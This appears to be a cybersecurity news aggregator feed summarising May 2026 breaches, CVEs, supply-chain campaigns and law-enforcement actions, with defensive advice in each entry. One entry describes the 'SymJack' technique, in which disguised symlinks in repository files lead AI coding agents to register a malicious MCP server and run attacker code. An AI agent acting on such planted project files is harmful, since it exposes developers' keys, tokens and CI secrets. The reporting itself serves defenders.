This article is the same underlying event: Carnival's confirmation that an April compromise of an employee account led to theft of customer data later claimed by ShinyHunters. It adds that the company says copied data includes names, contact details, dates of birth, driver's license numbers, and passport numbers, and cites the Maine filing showing nearly 6 million affected individuals.
2026.05.28 99%
This article is the same underlying event: Carnival's April 14, 2026 social-engineering breach attributed to ShinyHunters. It adds that Carnival's Maine filing lists just under 6 million affected individuals, confirms stolen data types including names, addresses, email addresses, phone numbers, dates of birth, and state identification numbers, and notes that breach notices and two years of credit monitoring are being sent.
Sergiu Gatlan 2026.05.28 100%
This article appears to be the first concrete confirmation and scope disclosure for Carnival's April 2026 breach, tying the incident to a social-engineering attack and a nearly 6 million-person impact.
Full page
Romanian hacker sentenced in U.S. for selling access to Oregon state government network
13D ago 3 sources
Breaches & Data LeaksThreat Actors & APTsGovernmentOregon state governmentU.S. Justice Department
A Romanian hacker was sentenced in the United States for breaking into an Oregon state government office and selling that network access to others. Catalin Dragomir admitted hacking the state office in June 2021, selling access for $3,000 in Bitcoin, and trafficking data from at least 10 other U.S. organizations; the Justice Department said the broader activity caused more than $250,000 in losses. He received a 4 year and 8 month prison sentence after extradition from Romania.
Why it matters: This is a reminder that stolen network access to government systems is an active criminal market, not just a one-off intrusion. Public agencies and contractors should review identity controls, monitor for unauthorized remote access, and ensure former or unusual accounts and access paths are investigated quickly.
Sources
Sergiu Gatlan 2026.05.28 99%
This article is the same underlying event and adds the sentencing specifics: Catalin Dragomir received 56 months in prison, forfeited about 23 Monero, and prosecutors said he sold access to the Oregon Department of Emergency Management network and nearly a dozen other U.S. victims, causing at least $250,000 in losses.
2026.05.27 99%
This article is the same underlying event and adds the sentencing outcome: Catalin Dragomir received 56 months in prison after pleading guilty to aggravated identity theft and obtaining information from a protected computer for hacking Oregon’s Office of Emergency Management and selling administrative credentials.
Eduard Kovacs 2026.05.27 100%
The article establishes a distinct law-enforcement milestone tied to the compromise and resale of access to an Oregon state network, and it does not match any existing tracked story in the list.
Full page
Gitea CVE-2026-27771 let anyone pull private container images from thousands of self-hosted servers
13D ago 1 sources
Zero-Days & CVEsUrgent PatchesSupply ChainTechnology & SoftwareGiteaForgejo
A flaw in Gitea could let outsiders download supposedly private software container images from many self-hosted code servers. NoScope says CVE-2026-27771 is an access-control bug in Gitea’s built-in container registry, also affecting Forgejo, where anonymous Docker/OCI pull requests could retrieve private images; Gitea patched it in version 1.26.2, and Shodan data suggested roughly 31,750 internet-facing instances were likely vulnerable.
Why it matters: Private container images can contain source code, credentials, and details about production systems, so this exposure could hand attackers valuable access and intelligence. Organizations running self-hosted Gitea or Forgejo should update to 1.26.2 immediately or enforce authentication for all content access if possible.
Sources
Ionut Arghire 2026.05.28 100%
This article establishes a new tracked story around CVE-2026-27771, a newly reported Gitea/Forgejo container registry access-control flaw with patch availability and internet-scale exposure.
Full page
CrowdStrike, Google and Shadowserver disrupt GlassWorm botnet targeting Visual Studio, npm, PyPI and GitHub developers
14D ago 3 sources
Supply ChainThreat Actors & APTsMalwareTechnology & SoftwareCryptocurrency & BlockchainGoogleMicrosoftGitHubnpmPyPIOpenVSX
Security firms say they disrupted the GlassWorm botnet, a malware operation that infected developers and open source software ecosystems and could be used to steal credentials, cryptocurrency wallet data, and remote access to infected machines. CrowdStrike says GlassWorm spread through trojanized Visual Studio extensions on OpenVSX and later through GitHub and compromised Python projects, while using Solana blockchain transactions, Google Calendar, BitTorrent and VPS-hosted servers as layered command-and-control channels. The malware hid code with Unicode variation selectors and stole npm, GitHub and Git credentials, creating downstream software supply-chain risk.
Why it matters: This matters because a compromise of developers can spread to the software and updates many other organizations rely on. Teams should check for beaconing to 164.92.88[.]210, investigate developer machines and repositories for compromise, rotate exposed credentials, and review software supply-chain protections.
Sources
2026.05.27 99%
This article is another report on the same GlassWorm disruption event, adding operational detail on the takedown timing, the four command-and-control channels hit simultaneously, and specifics on GlassWorm’s use of Solana memos, Google Calendar, BitTorrent DHT, and VPS-hosted payload servers.
Ionut Ilascu 2026.05.27 97%
This is the same underlying event: the coordinated takedown of the GlassWorm botnet. The article adds specific detail on the botnet's resilient command-and-control design across Solana transaction memos, BitTorrent DHT, Google Calendar dead drops, and direct VPS servers, plus a post-takedown beacon IP and mention of published YARA detection rules.
Ionut Arghire 2026.05.27 100%
This article establishes a distinct tracked event: the disruption of the GlassWorm developer-targeting botnet and new details on its multi-channel command-and-control infrastructure, scope across ecosystems, and defender actions.
Full page
Pretalx patched stored XSS flaw CVE-2026-41241 that could let conference organizers' accounts be hijacked
14D ago 2 sources
Zero-Days & CVEsUrgent PatchesTechnology & SoftwareEducationMedia & EntertainmentPretalx
Pretalx, an open source platform used by many conferences to manage call-for-proposals and schedules, fixed a flaw that could let a malicious speaker submission run code in an organizer's browser. The issue, CVE-2026-41241, is a stored cross-site scripting (XSS) bug in searchable fields such as submission titles, speaker names, usernames, and email addresses; when an organizer searched for a matching record, attacker-supplied HTML or JavaScript could execute, steal a cross-site request forgery (CSRF) token, submit authenticated actions, or exfiltrate visible data. It was patched in April and fixed in pretalx 2026.1.0.
Why it matters: Conference teams using pretalx could have had proposal data changed or organizer sessions abused simply by viewing malicious submissions, so affected admins should update to pretalx 2026.1.0 or later and review organizer access and stored submissions. Because pretalx is reused across many events, one product bug can affect multiple independent conference systems at once.
Sources
Eduard Kovacs 2026.05.27 97%
This is the same underlying event: disclosure of CVE-2026-41241 in Pretalx and its patch in version 2026.1.0. The article adds clearer detail on the attack chain, explaining that a malicious speaker submission could trigger stored XSS when organizers search submissions, enabling organizer account takeover and abuse across multiple Pretalx-powered conferences.
2026.05.27 100%
This article appears to be the first tracked item establishing the pretalx CVE-2026-41241 disclosure, exploit mechanics, and patched version.
Full page
India CERT-In tells organizations to patch or isolate exploited internet-facing vulnerabilities within 12 hours
14D ago 1 sources
Urgent PatchesPolicy & RegulationGovernmentTechnology & SoftwareCERT-In
India's national cyber agency has told organizations to fix, mitigate, or disconnect exposed critical systems within 12 hours when a known-exploited vulnerability affects them. In new CERT-In guidance on defending against AI-assisted attacks, the agency says the half-day target applies where feasible to internet-facing or 'crown jewel' systems with exploited n-day flaws, while other cases such as internal systems generally get a 24-hour target; this is guidance rather than a single-CVE advisory.
Why it matters: This raises the urgency for Indian organizations and anyone tracking national cyber guidance as attackers use artificial intelligence to speed up exploitation. Defenders should review patching and mitigation playbooks now so internet-exposed high-value systems can be patched, shielded, or taken offline quickly when active exploitation is known.
Sources
2026.05.27 100%
This article establishes a new trackable story because it centers on a new CERT-In directive-style guidance change setting a 12-hour response expectation for known-exploited flaws, not on any previously listed breach, CVE, or advisory event.
Full page
Dutch police arrest suspect in Ajax Amsterdam hack that exposed fan accounts and ticketing controls
14D ago 2 sources
Breaches & Data LeaksMedia & EntertainmentConsumers & General PublicAjax Amsterdam
Dutch police arrested a 35-year-old man suspected of repeatedly breaking into Ajax Amsterdam's computer systems earlier in 2026. Ajax previously said the attacker exploited vulnerabilities in its IT systems to access data on a few hundred people, while reporting indicated exposed application programming interfaces (APIs) and shared keys could let someone view more than 300,000 accounts, alter 538 supporter stadium bans, and reassign 42,000 season tickets; no CVE was cited.
Why it matters: This matters to Ajax fans and the club because the intrusion reportedly reached both personal data and operational controls like bans and ticket transfers. Anyone affected should watch for account abuse or phishing, and organizations should review exposed APIs, shared credentials, and access controls in customer and ticketing systems.
Sources
2026.05.27 99%
This article covers the same underlying Ajax breach and adds that Dutch police arrested a 35-year-old suspect in Buren, searched his home, and seized digital storage devices; it also reiterates that the intrusion involved an unpatched vulnerability and may have affected far more supporters and season tickets than Ajax initially disclosed.
Sergiu Gatlan 2026.05.27 100%
This article establishes a distinct story by tying the previously disclosed Ajax intrusion to a suspect arrest and restating the scope and impact of the breach on fan data and ticketing systems.
Full page
Researchers link LA Metro cyberattack to Iranian government hackers after disruptive March breach
14D ago 2 sources
Threat Actors & APTsMalwareBreaches & Data LeaksTransportation & LogisticsGovernmentLA MetroMicrosoft
Researchers say the March cyberattack on Los Angeles Metro was likely carried out by Iranian state-linked hackers, not just a self-described hacktivist group. LA Metro said the breach caused internal operational disruption and required hundreds of servers to be checked before restoration, while the attackers claimed to have wiped hundreds of terabytes and stolen more than 1 terabyte of data. Gambit linked the operation to infrastructure associated with Black Shadow, a group previously attributed to Iran's Ministry of Intelligence and Security, and said the attackers also accessed systems including virtualization management, Microsoft IIS servers, and a train-monitoring operational technology system.
Why it matters: A breach at a major transit agency raises concern not only about data theft but also about disruption to public services and potential access to operational systems. Transit operators and other public-sector defenders should review exposure of administrative platforms and monitoring systems, hunt for data theft and destructive activity, and treat claimed hacktivist incidents as possible state-backed operations.
Sources
2026.05.27 98%
This is the same underlying event: the March breach of the Los Angeles County Metropolitan Transportation Authority. The article adds that Gambit Security attributes the operation specifically to an Iran MOIS-linked group calling itself Ababil of Minab, describes destructive activity against databases, virtual machines, storage volumes, and backups, and notes additional victims in Israel, Turkey, Saudi Arabia, and other sectors.
Eduard Kovacs 2026.05.27 100%
This article establishes a distinct tracked story by adding substantive attribution and technical context to the previously reported LA Metro breach, tying the incident to Iranian state-linked infrastructure and broader targeting.
Full page
Researchers show 'SymJack' attack can trick Claude Code, Copilot CLI, Gemini CLI and other AI coding agents into installing malicious tools
14D ago 1 sources
Supply ChainSocial Engineering & PhishingTechnology & SoftwareAnthropicGoogleGitHubCursorxAI
Researchers say attackers can abuse trusted-looking project files in code repositories to make AI coding agents install attacker-controlled components and run malicious code on a developer's machine or in continuous integration (CI) systems. Adversa's 'SymJack' technique uses disguised symbolic links (symlinks) and a copy command to silently register a malicious Model Context Protocol (MCP) server; the firm says it worked against Claude Code, Gemini CLI, Antigravity CLI, Cursor Agent CLI, Grok Build CLI, and GitHub Copilot CLI, and published a proof of concept on GitHub. Anthropic reportedly hardened Claude Code to resolve symlinks before approval and show the true destination path.
Why it matters: Teams using AI coding agents could unknowingly approve changes that steal SSH keys, cloud tokens, browser sessions, or CI secrets and then push malicious code downstream. This is urgent for developers and DevOps teams using agentic coding tools: review repository trust assumptions, restrict or audit MCP server registration, scrutinize file-copy prompts, and apply vendor mitigations where available.
Sources
Kevin Townsend 2026.05.27 100%
This article appears to be the initial reporting of the SymJack technique as a named, cross-vendor attack pattern with a public proof of concept and documented vendor responses.
Full page
CISA adds exploited LiteSpeed cPanel plugin zero-day CVE-2026-48172 to KEV and urges immediate removal or patching
14D ago 2 sources
Urgent PatchesZero-Days & CVEsTechnology & SoftwareGovernmentCISALiteSpeedcPanel
CISA says a critical bug in the LiteSpeed user-end plugin for cPanel is being actively exploited and can give attackers root-level control of affected servers. The flaw, CVE-2026-48172, is a 9.8-severity privilege-escalation vulnerability affecting user-end plugin versions 2.3 through 2.4.4; LiteSpeed fixed it in version 2.4.5, later bundled in WHM Plugin 5.3.1.0 with user-end plugin 2.4.7, while cPanel also removed the vulnerable plugin via a nightly update on May 19.
Why it matters: Organizations running cPanel with the LiteSpeed user-end plugin could be exposed to full server compromise, so this is an update-now or remove-now situation. Admins should upgrade immediately, remove the plugin if they cannot patch, and review logs and suspicious IP activity for signs of exploitation.
Sources
Sergiu Gatlan 2026.05.27 98%
This article covers the same underlying event—active exploitation of LiteSpeed cPanel plugin flaw CVE-2026-48172 and CISA's KEV action—and adds the concrete BOD 22-01 deadline giving U.S. federal agencies four days, until May 29, 2026, to patch or discontinue use.
Ionut Arghire 2026.05.27 100%
This article establishes a new tracked story centered on CVE-2026-48172: an actively exploited LiteSpeed cPanel plugin zero-day, its vendor fix, cPanel mitigation, and CISA KEV listing.
Full page
Attackers exploited KnowledgeDeliver zero-day CVE-2026-5426 to install web shells and backdoors on LMS servers
15D ago 2 sources
Zero-Days & CVEsMalwareThreat Actors & APTsEducationTechnology & SoftwareDigital Knowledge
Hackers used a previously unknown flaw in Digital Knowledge’s KnowledgeDeliver learning platform to break into servers and plant persistent malware. Mandiant says CVE-2026-5426 affects KnowledgeDeliver deployments before February 24, 2026, because a standardized ASP.NET web.config file contained hardcoded machineKey values, enabling ViewState deserialization attacks for remote code execution. The observed intrusions deployed Godzilla web shells, altered JavaScript to show fake plugin alerts, and ultimately installed a tailored Cobalt Strike backdoor.
Why it matters: Organizations using KnowledgeDeliver, especially enterprise and education users, may already be compromised, not just vulnerable. Admins should urgently rotate machine keys, restrict access to the LMS, hunt for the published indicators of compromise, and check for web shells, modified JavaScript, and follow-on malware.
Sources
Ionut Ilascu 2026.05.26 98%
This article is a direct update on the same Mandiant-reported event, adding technical detail that the unauthenticated flaw was a ViewState deserialization issue caused by shared hardcoded ASP.NET machine keys, and that attackers deployed the Godzilla web shell, altered JavaScript to push a fake 'security authentication plugin,' and delivered Cobalt Strike.
Ionut Arghire 2026.05.26 100%
This article establishes a distinct new incident: in-the-wild exploitation of KnowledgeDeliver zero-day CVE-2026-5426, including the attack chain, malware used, affected versions, and mitigation steps.
Full page
Play ransomware gang lists MyPillow as an alleged victim and threatens to leak stolen company and employee data
15D ago 1 sources
RansomwareBreaches & Data LeaksRetail & E-CommerceManufacturingConsumers & General PublicMyPillow
Play ransomware operators have posted MyPillow to their leak site, claiming they stole sensitive internal data and will publish it if the company does not pay. According to the gang’s dark-web extortion post, the alleged haul includes personal and confidential data, client documents, budgets, payroll records, IDs, tax files, and finance information. The article does not provide technical details on the intrusion method, affected systems, or data volume, and MyPillow had not confirmed the breach at publication time.
Why it matters: If the claim is accurate, employees, customers, and business partners could face privacy risks, fraud, or follow-on phishing using stolen records. Defenders should watch for confirmation, review for signs of Play ransomware activity, and prepare incident-response, notification, and credential-reset steps if exposure is verified.
Sources
2026.05.26 100%
This article appears to be the first report in the provided set identifying MyPillow as a new alleged Play ransomware victim, establishing a distinct incident rather than updating an existing tracked story.
Full page
Lithuania investigates leak of more than 600,000 national register records after suspected foreign access using institutional credentials
15D ago 2 sources
Breaches & Data LeaksThreat Actors & APTsGovernmentConsumers & General PublicLithuanian Prosecutor General's OfficeCentre of Registers
Lithuania says more than 600,000 entries from national data registers were leaked after someone used login credentials belonging to authorized institutions. Prosecutors said the exposed data mainly came from real-estate and legal-entity registers, authorities suspect a foreign country was involved, and access was tightened by blocking suspected accounts and forcing credential updates.
Why it matters: This is a major government-data exposure with potential risks to ordinary citizens as well as officials, diplomats, and security personnel. Organizations with access to Lithuanian state registers should urgently review account use, rotate credentials, and check for unauthorized queries or data exports.
Sources
2026.05.26 98%
This article is the same underlying event and adds details on the affected registers (Real Estate and Legal Entities), the types of data exposed, the use of institutional login credentials, the timeline of detection and delayed disclosure, account-blocking and credential-reset measures, estimated financial damage, and the resignation of the Centre of Registers chief.
Associated Press 2026.05.26 100%
This article establishes a distinct new story: a large-scale leak from Lithuanian national registers tied to misuse of authorized-access credentials and possible foreign intelligence involvement.
Full page
Iran-linked Nimbus Manticore targets aviation and software companies with new MiniFast backdoor and fake job lures
15D ago 1 sources
Threat Actors & APTsMalwareSocial Engineering & PhishingDefense & AerospaceTechnology & SoftwareOnlyOfficeZoomOracle
An Iran-linked hacking group is using fake job offers and trojanized software downloads to break into aviation and software companies, including targets in Saudi Arabia, Australia, and the United States. Check Point says Nimbus Manticore (also known as Bohrium, TA455, and UNC1549) switched from DLL sideloading to AppDomain hijacking, using malicious .NET configuration files to load payloads, and deployed updated MiniJunk malware plus a new Windows DLL backdoor called MiniFast through ZIP files on OnlyOffice, a fake Zoom installer, and a fake SQL Developer site boosted with search-engine optimization.
Why it matters: This campaign shows continued state-linked targeting of sensitive industries during heightened regional tensions, with lures that can fool both job seekers and employees downloading familiar tools. Organizations in aviation, defense-adjacent, and software sectors should warn staff about recruiter and installer lures, review detections for MiniJunk and MiniFast, and hunt for suspicious .config-based AppDomain hijacking activity.
Sources
Ionut Arghire 2026.05.26 100%
The article establishes a distinct new campaign and tooling update for Nimbus Manticore, including a new backdoor, new execution technique, and an apparent expansion toward U.S. targets rather than simply re-reporting a previously tracked event.
Full page
7-Eleven discloses breach of franchisee document systems after ShinyHunters claims
15D ago 3 sources
Threat Actors & APTsBreaches & Data LeaksRetail & E-CommerceConsumers & General Public7-ElevenSalesforce
7-Eleven disclosed that attackers accessed systems used to store franchisee documents, with stolen data including names, addresses, and Social Security numbers. The company said it discovered the breach on April 8 and reported it to state regulators in Maine, Vermont, and Massachusetts. The disclosure follows ShinyHunters' late-April claim that it stole 7-Eleven data allegedly stored on Salesforce.
Why it matters: The breach exposes sensitive personal data tied to U.S. franchise operations, creating identity theft and follow-on phishing risk for affected individuals. Defenders and franchisees should watch for extortion fallout, credential abuse, and notices clarifying scope and attack path.
Sources
Ionut Arghire 2026.05.26 98%
This is the same underlying April 2026 7-Eleven breach involving franchise-document systems and ShinyHunters' claimed theft of Salesforce records. The article adds a likely victim count from HaveIBeenPwned (about 185,300 people) and says the leaked data includes names, addresses, email addresses, and dates of birth, with some records containing additional fields.
Sergiu Gatlan 2026.05.26 98%
This is the same April 2026 7-Eleven breach of systems used to store franchisee documents; the new reporting adds an estimated victim count of 185,300 people from Have I Been Pwned and specifies exposed fields including names, dates of birth, email addresses, phone numbers, and physical addresses, while reiterating ShinyHunters' claimed link to a Salesforce-related compromise.
2026.05.20 100%
This article establishes a distinct breach event at 7-Eleven and provides the first concrete confirmation of stolen franchisee data following ShinyHunters' public claims.
Full page
Dutch investigators seize 800 servers tied to Stark Industries hosting network allegedly used for cyberattacks and disinformation
15D ago 4 sources
Policy & RegulationDisinformation & Influence OpsThreat Actors & APTsTechnology & SoftwareGovernmentStark IndustriesDutch PoliceDutch Public Prosecution Service
Dutch authorities say they seized 800 servers and arrested two men linked to a hosting operation that allegedly helped cyberattacks, disruption campaigns, and online disinformation. Investigators said the action targeted infrastructure connected to Stark Industries, an EU-sanctioned hosting provider, and two Dutch companies allegedly used to keep its services running after sanctions; reporting links the network to pro-Russian DDoS, or distributed denial-of-service, activity by NoName057(16).
Why it matters: This matters because the seizure hits infrastructure allegedly used to support both cyberattacks and influence operations in Europe. Defenders, hosting providers, and abuse teams should watch for fallout such as service migration, replacement infrastructure, and renewed DDoS activity from the same actors.
Sources
Ionut Arghire 2026.05.26 98%
This article is a direct update on the Stark Industries case, adding that Dutch authorities arrested two administrators of Dutch companies allegedly acting as fronts and infrastructure providers for the sanctioned hosting network, and confirming seizures at data centers and searches tied to Mirhosting and WorkTitans.
2026.05.25 98%
This article is a direct update on the same Dutch/Stark Industries enforcement action, adding that two Dutch IT entrepreneurs were arrested, naming the suspected related firms via reporting, and detailing allegations that the infrastructure was used by the Doppelgänger-linked Reliable Recent News network and in NoName057(16) DDoS attacks while evading EU sanctions.
BrianKrebs 2026.05.25 99%
This article appears to cover the same underlying event: Dutch authorities arrested two operators linked to MIRhosting and WorkTitans, searched multiple sites, and seized more than 800 servers tied to the Stark Industries network allegedly used in Russia-linked cyberattacks and disinformation. It adds names of the suspects, the sanctions-evasion allegations, and reporting tying the infrastructure to attacks on Danish government bodies during the 2025 municipal election period.
Bill Toulas 2026.05.22 100%
This article establishes a distinct new story: a Dutch law-enforcement action against Stark Industries-linked hosting infrastructure allegedly enabling cyberattacks and disinformation, not the previously tracked seizure of the separate First VPN service.
Full page
Drupal announces critical core security update for high-risk vulnerability affecting versions 8 and later
15D ago 8 sources
Zero-Days & CVEsUrgent PatchesTechnology & SoftwareDrupal
Drupal announced a core security release for May 20, 2026, warning that exploits could appear within hours of disclosure. The issue affects Drupal core 8+ with patches planned for supported 11.x and 10.x branches, plus hotfixes for end-of-life 9.5 and 8.9 releases. No CVE or technical details were disclosed ahead of release.
Why it matters: Drupal is widely used by government, education, healthcare, and large organizations, so a high-risk core flaw has broad exposure. Defenders should monitor the advisory and be ready to apply updates immediately, especially because Drupal expects rapid exploit development.
Sources
Sergiu Gatlan 2026.05.26 94%
This article updates the same Drupal vulnerability event by adding that the flaw is tracked as CVE-2026-9082, is being actively exploited, has been added to CISA's KEV catalog, and now carries a Binding Operational Directive deadline for U.S. federal agencies to patch by May 27, 2026.
info@thehackernews.com (The Hacker News) 2026.05.23 94%
This appears to update the same Drupal core vulnerability event by adding that the flaw is being actively exploited and has now been added to CISA's KEV catalog, increasing urgency beyond the original critical update notice.
Eduard Kovacs 2026.05.22 96%
This is the direct follow-up to the same Drupal event, adding that CVE-2026-9082 is now seeing exploitation attempts in the wild, that Drupal raised its risk score, and that Imperva observed more than 15,000 attempts targeting nearly 6,000 sites across 65 countries.
Bill Toulas 2026.05.22 98%
This is a direct update to the same Drupal core flaw disclosed earlier in the week, adding the key new fact that exploit attempts for CVE-2026-9082 have now been detected in the wild and reiterating affected branches and upgrade guidance.
Eduard Kovacs 2026.05.21 97%
This article is the follow-up patch release for the same Drupal security event, adding the CVE identifier (CVE-2026-9082), technical details about the PostgreSQL SQL injection flaw, impact including possible unauthenticated RCE, and the fixed version branches.
info@thehackernews.com (The Hacker News) 2026.05.21 97%
This appears to cover the same May 2026 Drupal core security release, adding that the flaw is highly critical, affects PostgreSQL-based Drupal deployments, and can expose affected sites to remote code execution attacks.
Bill Toulas 2026.05.20 100%
This article establishes a new story because it is the initial report of a specific Drupal core security release tied to a high-exploitation-risk vulnerability, and it does not match any existing tracked event.
2026.05.19 98%
This article covers the same pre-disclosure Drupal core security release window for May 20, 2026, adding detail on affected branches including best-effort patches for unsupported 8.9 and 9.5, the advisory's severity characterization, and Drupal's warning to reserve immediate patch time because exploit code could follow quickly.
Full page
Kremlin appoints former Rostec cyber executive reportedly linked to GRU Unit 26165 to Russian Security Council post
15D ago 1 sources
Threat Actors & APTsDisinformation & Influence OpsGovernmentDefense & AerospaceTechnology & SoftwareKremlinRussian Security CouncilRostecRT-Information SecurityGRU
Russia has appointed a former cybersecurity executive reportedly tied to a military intelligence hacking unit to a senior Security Council role. The Record reports that Andrei Kozlov, formerly of Rostec's RT-Information Security and a Russian cybersecurity industry association, was named an aide to Security Council Secretary Sergei Shoigu; leaked data cited by The Insider allegedly links him to GRU Military Unit 26165, widely tracked as Fancy Bear or APT28, a group long accused of espionage, credential theft and influence operations.
Why it matters: This matters because it may show direct overlap between Russia's state security leadership and a unit publicly tied to past hacking and disinformation campaigns. Defenders and policymakers should treat it as contextual evidence when tracking future APT28 operations, influence activity and Russian state cyber posture.
Sources
2026.05.25 100%
This article establishes a new story about a Russian state appointment with alleged ties to GRU Unit 26165/Fancy Bear, rather than updating an existing tracked breach, malware campaign, or policy case.
Full page
Signal says Canada’s Bill C-22 could force metadata collection and threaten encrypted messaging services
16D ago 2 sources
Surveillance & PrivacyInformation FreedomPolicy & RegulationGovernmentTechnology & SoftwareTelecommunicationsConsumers & General PublicSignalGovernment of Canada
Citizen Lab highlights concerns that Canada’s proposed lawful-access Bill C-22 could undermine encryption protections and require messaging services to collect metadata. Signal said it would leave the Canadian market rather than comply if the bill mandated such access, while researchers said officials were unwilling to clearly protect encryption.
Why it matters: The proposal could materially affect users of encrypted messaging in Canada, especially journalists, dissidents, and human-rights defenders. Defenders and civil-society groups should track the bill because it may create surveillance obligations or drive privacy-preserving services out of the market.
Sources
Claire Posno 2026.05.25 93%
This is the same underlying policy story around Canada’s proposed Bill C-22. It adds Citizen Lab’s argument that the bill could also pave the way for a U.S.-Canada CLOUD Act agreement enabling foreign law-enforcement requests for real-time surveillance, including wiretaps and device hacking in Canada.
Anna Mackay 2026.05.14 100%
This article establishes a distinct policy and privacy story around Canada’s Bill C-22 and its potential impact on encrypted communications, with a concrete response from Signal.
Full page
Attackers exploit Ghost CMS SQL injection flaw CVE-2026-26980 to booby-trap hundreds of websites with ClickFix malware lures
16D ago 2 sources
Zero-Days & CVEsSocial Engineering & PhishingMalwareEducationFinance & BankingTechnology & SoftwareMedia & EntertainmentConsumers & General PublicGhost
Attackers are using a Ghost CMS bug to hijack websites and show visitors fake verification prompts that can infect their computers. The campaign abuses CVE-2026-26980, a critical unauthenticated SQL injection flaw affecting Ghost 3.24.0 through 6.19.0, to steal admin API keys and inject malicious JavaScript into article pages; researchers say more than 700 domains were hit, including university, media, fintech, and tech sites. Victims who follow the ClickFix instructions paste commands into Windows that download malware.
Why it matters: This affects both website owners and ordinary visitors: unpatched Ghost sites can be silently turned into malware delivery pages, and people browsing them can be tricked into infecting their own systems. Ghost administrators should update to 6.19.1 or later immediately, rotate exposed keys, and check for injected scripts and suspicious admin API activity.
Sources
Eduard Kovacs 2026.05.25 98%
This source is a direct update on the same underlying event: active exploitation of Ghost CMS CVE-2026-26980 to compromise websites and inject ClickFix-related malicious JavaScript. It adds concrete scope and victim detail, saying more than 700 sites were hacked, including sites tied to DuckDuckGo, Harvard, and Oxford, and notes at least two groups are competing in the poisoning campaign.
Bill Toulas 2026.05.24 100%
This article establishes a distinct security story by tying active, large-scale exploitation of Ghost CMS CVE-2026-26980 to website compromises and downstream ClickFix malware delivery across more than 700 domains.
Full page
Oncology Institute says third-party vendor breach exposed patient data across its cancer-care network
16D ago 1 sources
Breaches & Data LeaksSupply ChainHealthcareTechnology & SoftwareThe Oncology InstituteTriZetto Provider SolutionsCognizant
The Oncology Institute says a breach at an outside software services provider affected patient information in its systems. TOI said Kroll notified it on May 20, 2026 that the vendor detected unauthorized access to TOI information systems, including systems containing patient data; the vendor was not named, but the timeline and disclosure process point to Cognizant-owned TriZetto Provider Solutions as a possible match. TOI operates more than 100 clinics across five U.S. states.
Why it matters: Cancer patients and healthcare staff may face privacy risks and follow-on fraud if their information was exposed. Affected users should watch for breach notices and suspicious calls or emails, while healthcare organizations using the same vendor should review exposure and incident-response steps immediately.
Sources
Eduard Kovacs 2026.05.25 100%
This article establishes a distinct victim disclosure tied to a third-party healthcare software provider breach, with TOI newly confirming that patient data was affected.
Full page
Radiology Associates of Richmond says 266,000 people were affected by a breach that exposed medical and personal data
16D ago 1 sources
Breaches & Data LeaksHealthcareConsumers & General PublicRadiology Associates of Richmond
Radiology Associates of Richmond disclosed that hackers stole files containing sensitive patient information, affecting 266,183 people. The organization says attackers accessed internal systems on or about July 25, 2025, and a forensic investigation completed in April 2026 found unauthorized acquisition of files with protected health information. State filings indicate exposed data may include names, Social Security numbers, government ID numbers, financial account or payment-card details, and medical and health insurance information.
Why it matters: This is significant because it involves health data plus identity and financial information, raising risks of medical-identity fraud and broader identity theft. Affected people should watch for official notice letters, use offered credit monitoring if eligible, and monitor medical, insurance, and financial accounts for misuse.
Sources
Ionut Arghire 2026.05.25 100%
The article establishes a distinct breach event at Radiology Associates of Richmond with its own victim count, timeline, and disclosure details; it does not match any existing tracked story.
Full page
Laravel Lang Composer packages hijacked through rewritten Git tags to deliver credential-stealing malware
16D ago 2 sources
Breaches & Data LeaksSupply ChainMalwareTechnology & SoftwareCryptocurrency & BlockchainConsumers & General PublicLaravel LangGitHub
Attackers compromised Laravel Lang localization packages and made legitimate-looking Composer installs fetch malware instead. The attackers rewrote existing GitHub release tags across laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and possibly laravel-lang/actions to point to malicious commits in a fork, affecting hundreds of historical versions; the payload drops a PHP stealer that targets cloud keys, CI/CD secrets, SSH keys, browser data, crypto wallets, and on Windows launches a helper executable dubbed DebugElevator to decrypt Chromium-based browser credentials.
Why it matters: Developers and organizations that installed these packages could have had passwords, cloud credentials, and deployment secrets stolen without realizing it. Treat this as urgent: identify affected installs, remove compromised versions, rotate any exposed secrets, and review developer and build systems for follow-on access.
Sources
Ionut Arghire 2026.05.25 99%
This article covers the same Laravel-Lang package compromise and adds concrete details on the attack timeline, the four affected packages, the use of rewritten Git tags pointing to commits in a malicious fork, the C2 domain flipboxstudio[.]info, and the breadth of targeted secrets that defenders should rotate.
Lawrence Abrams 2026.05.23 100%
This article establishes a distinct supply-chain attack centered on the Laravel Lang package ecosystem, with a specific compromise method (Git tag rewriting) and malware payload, and it does not match any existing tracked story.
Full page
DocketWise says breach of third-party repositories exposed sensitive law firm and immigration case data for 143,000 people
16D ago 1 sources
Breaches & Data LeaksTechnology & SoftwareLegal & Professional ServicesConsumers & General PublicDocketWise
DocketWise says hackers accessed data tied to more than 143,000 people after cloning third-party partner repositories used in its data migration pipeline. The exposed records may include names, addresses, dates of birth, Social Security numbers, passport and driver's license data, financial account and payment card information, tax IDs, health insurance details, and medical condition or treatment information. The company says it began investigating in October 2025 and later determined some cloned repositories contained DocketWise law firm records.
Why it matters: People whose information was exposed face a real risk of identity theft, account fraud, and targeted scams, especially because the stolen data includes government IDs, financial details, and medical information. Affected users should watch for notice letters, enable fraud alerts or credit freezes where appropriate, and be cautious of messages claiming to help with immigration or legal matters.
Sources
Ionut Arghire 2026.05.25 100%
This article appears to be the first concrete disclosure here of the DocketWise breach, including the victim count, the type of data exposed, and the stated attack path through cloned third-party repositories.
Full page
Megalodon campaign poisons more than 5,500 GitHub repositories to steal CI/CD and cloud credentials
16D ago 2 sources
Breaches & Data LeaksSupply ChainMalwareTechnology & SoftwareGitHubBitbucketAmazon Web ServicesGoogle CloudMicrosoftTiledesk
A new automated attack dubbed Megalodon pushed malicious commits to more than 5,500 GitHub repositories, putting developers and organizations that merge those changes at risk of credential theft. Researchers say the malware runs in continuous integration and continuous delivery (CI/CD) pipelines after a poisoned commit is merged, then steals GitHub, Bitbucket, AWS, Google Cloud, Azure, SSH, Docker, Kubernetes, Vault, and Terraform secrets and can spread further; SafeDep also linked backdoored Tiledesk npm releases 2.18.6 through 2.18.12 to a compromised GitHub repository rather than a stolen npm account.
Why it matters: This can turn a routine code merge into a cloud-account and source-code compromise, especially for organizations that automatically build code from GitHub. Repo maintainers and security teams should review recent pull requests and commits, block suspicious automation, rotate CI/CD and cloud secrets, and check whether affected packages or repositories were used.
Sources
Ionut Arghire 2026.05.25 98%
